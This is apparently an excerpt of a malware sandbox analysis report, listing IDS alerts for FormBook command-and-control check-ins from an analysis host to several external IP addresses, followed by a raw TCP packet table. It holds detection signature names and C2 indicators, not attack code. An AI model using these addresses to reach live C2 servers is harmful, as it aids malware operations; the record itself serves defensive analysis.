                                                                                                                          2024-10-21T17:26:46.344977+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.657340103.224.182.24280TCP
                                                                                                                          2024-10-21T17:26:52.063051+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657341209.74.64.18780TCP
                                                                                                                          2024-10-21T17:26:54.627112+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657342209.74.64.18780TCP
                                                                                                                          2024-10-21T17:26:57.203134+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657343209.74.64.18780TCP
                                                                                                                          2024-10-21T17:26:59.734375+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.657344209.74.64.18780TCP
                                                                                                                          2024-10-21T17:27:05.640620+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65734765.21.196.9080TCP
                                                                                                                          2024-10-21T17:27:08.187589+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65734865.21.196.9080TCP
                                                                                                                          2024-10-21T17:27:10.688114+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65734965.21.196.9080TCP
                                                                                                                          2024-10-21T17:27:13.281250+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65735065.21.196.9080TCP
                                                                                                                          2024-10-21T17:27:19.884813+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573513.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:21.496502+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573523.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:24.048800+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573533.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:26.618719+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6573543.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:33.029167+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573553.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:34.636976+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573563.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:37.183225+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573573.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:39.729473+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6573583.33.130.19080TCP
                                                                                                                          2024-10-21T17:27:46.501070+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573598.210.49.13980TCP
                                                                                                                          2024-10-21T17:27:49.030879+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573608.210.49.13980TCP
                                                                                                                          2024-10-21T17:27:51.575501+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6573618.210.49.13980TCP
                                                                                                                          2024-10-21T17:27:54.172058+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6573628.210.49.13980TCP
                                                                                                                          2024-10-21T17:28:00.061996+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65736394.23.162.16380TCP
                                                                                                                          2024-10-21T17:28:02.600944+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65736694.23.162.16380TCP
                                                                                                                          2024-10-21T17:28:05.080540+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65736794.23.162.16380TCP
                                                                                                                          2024-10-21T17:28:07.631770+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65736894.23.162.16380TCP
                                                                                                                          2024-10-21T17:28:25.263211+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.657369188.114.96.380TCP
                                                                                                                          2024-10-21T17:28:30.849501+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65737052.13.151.17980TCP
                                                                                                                          2024-10-21T17:28:33.397854+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65737152.13.151.17980TCP
                                                                                                                          2024-10-21T17:28:35.945799+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65737252.13.151.17980TCP
                                                                                                                          2024-10-21T17:28:38.488784+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65737352.13.151.17980TCP
                                                                                                                          2024-10-21T17:28:52.296977+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657374103.106.67.11280TCP
                                                                                                                          2024-10-21T17:28:54.859422+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657375103.106.67.11280TCP

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 21, 2024 17:24:45.365761042 CEST4993080192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:24:45.371251106 CEST8049930188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:24:45.371388912 CEST4993080192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:24:45.379426956 CEST4993080192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:24:45.385018110 CEST8049930188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:24:45.945590973 CEST8049930188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:24:45.946857929 CEST8049930188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:24:45.946907997 CEST4993080192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:24:45.949054003 CEST4993080192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:24:45.954387903 CEST8049930188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:06.066015959 CEST4998880192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:06.074529886 CEST804998852.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:06.074637890 CEST4998880192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:06.085642099 CEST4998880192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:06.095686913 CEST804998852.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:06.652379990 CEST804998852.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:06.652417898 CEST804998852.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:06.652559996 CEST4998880192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:06.735044003 CEST804998852.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:06.735176086 CEST4998880192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:07.593779087 CEST4998880192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:08.613584995 CEST4999280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:08.618895054 CEST804999252.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:08.619056940 CEST4999280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:08.637603045 CEST4999280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:08.642920971 CEST804999252.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:09.193495035 CEST804999252.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:09.193511009 CEST804999252.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:09.193624973 CEST4999280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:09.273829937 CEST804999252.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:09.273974895 CEST4999280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:10.140636921 CEST4999280192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:11.159233093 CEST4999380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:11.165081024 CEST804999352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:11.165194988 CEST4999380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:11.176045895 CEST4999380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:11.182020903 CEST804999352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:11.182039022 CEST804999352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:11.754978895 CEST804999352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:11.755026102 CEST804999352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:11.755140066 CEST4999380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:11.834177971 CEST804999352.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:11.834382057 CEST4999380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:12.687522888 CEST4999380192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:13.707015038 CEST4999480192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:13.712650061 CEST804999452.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:13.712794065 CEST4999480192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:13.720053911 CEST4999480192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:13.725557089 CEST804999452.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:14.287341118 CEST804999452.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:14.287419081 CEST804999452.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:14.287533045 CEST4999480192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:14.368536949 CEST804999452.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:14.368791103 CEST4999480192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:14.369508982 CEST4999480192.168.2.652.13.151.179
                                                                                                                          Oct 21, 2024 17:25:14.374898911 CEST804999452.13.151.179192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:27.860243082 CEST4999580192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:27.865933895 CEST8049995103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:27.866054058 CEST4999580192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:27.875425100 CEST4999580192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:27.881354094 CEST8049995103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:28.708517075 CEST8049995103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:28.750060081 CEST4999580192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:28.765295029 CEST8049995103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:28.765397072 CEST4999580192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:29.390799999 CEST4999580192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:30.409354925 CEST4999880192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:30.415035963 CEST8049998103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:30.415158033 CEST4999880192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:30.426186085 CEST4999880192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:30.431811094 CEST8049998103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:31.017003059 CEST8049998103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:31.062664032 CEST4999880192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:31.071933985 CEST8049998103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:31.072021961 CEST4999880192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:31.937531948 CEST4999880192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:32.956110001 CEST4999980192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:32.961762905 CEST8049999103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:32.961963892 CEST4999980192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:32.973068953 CEST4999980192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:32.978851080 CEST8049999103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:32.979286909 CEST8049999103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:33.574793100 CEST8049999103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:33.625031948 CEST4999980192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:33.629647017 CEST8049999103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:33.629726887 CEST4999980192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:34.484409094 CEST4999980192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:35.502980947 CEST5000080192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:35.508668900 CEST8050000103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:35.508763075 CEST5000080192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:35.515748024 CEST5000080192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:35.521632910 CEST8050000103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:36.321356058 CEST8050000103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:36.374954939 CEST5000080192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:36.376540899 CEST8050000103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:36.376640081 CEST5000080192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:36.377504110 CEST5000080192.168.2.6103.106.67.112
                                                                                                                          Oct 21, 2024 17:25:36.383097887 CEST8050000103.106.67.112192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.412554026 CEST5000180192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:41.418459892 CEST8050001188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.419413090 CEST5000180192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:41.430562019 CEST5000180192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:41.436007023 CEST8050001188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.935950041 CEST8050001188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.935970068 CEST8050001188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.935985088 CEST8050001188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.936044931 CEST5000180192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:41.936049938 CEST8050001188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.936064005 CEST8050001188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.936075926 CEST8050001188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.936093092 CEST5000180192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:41.936125994 CEST5000180192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:41.936213970 CEST8050001188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.937129021 CEST8050001188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:41.937186956 CEST5000180192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:42.937635899 CEST5000180192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:43.958801985 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:43.964370012 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:43.964462996 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:43.983957052 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:43.991121054 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510607958 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510621071 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510632992 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510639906 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510648966 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510656118 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510703087 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510710001 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.510711908 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:44.510803938 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:44.510803938 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:44.513263941 CEST8050002188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:44.513442039 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:45.500166893 CEST5000280192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:46.519042015 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:46.524936914 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:46.525023937 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:46.538314104 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:46.543903112 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:46.543962002 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065124035 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065136909 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065200090 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065234900 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065289974 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065311909 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:47.065311909 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:47.065325975 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065365076 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065371990 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:47.067542076 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.067612886 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:48.046921968 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.065587997 CEST5000480192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.071357965 CEST8050004188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:49.071450949 CEST5000480192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.077462912 CEST5000480192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.082925081 CEST8050004188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:49.589481115 CEST8050004188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:49.591342926 CEST8050004188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:49.591454983 CEST5000480192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.592391014 CEST5000480192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.597805977 CEST8050004188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:54.620625019 CEST5000580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:54.626147985 CEST80500053.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:54.627228022 CEST5000580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:54.643352985 CEST5000580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:54.650038958 CEST80500053.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:55.057995081 CEST80500053.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:55.058197021 CEST5000580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:56.156872988 CEST5000580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:56.162446022 CEST80500053.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:57.182322979 CEST5000880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:57.188049078 CEST80500083.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:57.191109896 CEST5000880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:57.201503038 CEST5000880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:57.207029104 CEST80500083.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:57.616095066 CEST80500083.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:57.616174936 CEST5000880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:58.703278065 CEST5000880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:58.709234953 CEST80500083.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:59.733566999 CEST5000980192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:59.891983032 CEST80500093.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:59.892069101 CEST5000980192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:59.910567999 CEST5000980192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:59.916326046 CEST80500093.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:59.916363955 CEST80500093.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:01.272411108 CEST80500093.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:01.277396917 CEST5000980192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:01.423147917 CEST5000980192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:01.429265976 CEST80500093.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:02.440749884 CEST5001080192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:02.446053028 CEST80500103.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:02.446126938 CEST5001080192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:02.454828024 CEST5001080192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:02.460712910 CEST80500103.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:04.854501963 CEST80500103.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:04.855038881 CEST80500103.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:04.855339050 CEST5001080192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:04.870131016 CEST5001080192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:04.875682116 CEST80500103.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:10.608156919 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:10.613770962 CEST8057327217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:10.613846064 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:10.623488903 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:10.629015923 CEST8057327217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:11.174297094 CEST8057327217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:11.219341040 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:11.245690107 CEST8057327217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:11.247612000 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:12.125025988 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:13.144195080 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:13.149746895 CEST8057328217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:13.151053905 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:13.163052082 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:13.168482065 CEST8057328217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:13.709779024 CEST8057328217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:13.751070023 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:13.782599926 CEST8057328217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:13.782686949 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:14.671957016 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:15.690181017 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:15.695856094 CEST8057329217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:15.695997953 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:15.710289955 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:15.715869904 CEST8057329217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:15.715960979 CEST8057329217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:16.281411886 CEST8057329217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:16.328130960 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:16.328612089 CEST8057329217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:16.328680992 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:17.218885899 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.237478018 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.243100882 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:18.243304968 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.250752926 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.256267071 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:18.810642004 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:18.810723066 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:18.811053991 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.883183956 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:18.886605024 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.891979933 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.897418976 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:23.962228060 CEST5733380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:23.967864037 CEST805733394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:23.967948914 CEST5733380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:23.979671001 CEST5733380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:23.985119104 CEST805733394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:24.623505116 CEST805733394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:24.623719931 CEST5733380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:25.484532118 CEST5733380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:25.490058899 CEST805733394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:26.503072023 CEST5733480192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:26.509176970 CEST805733494.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:26.509315968 CEST5733480192.168.2.694.23.162.163
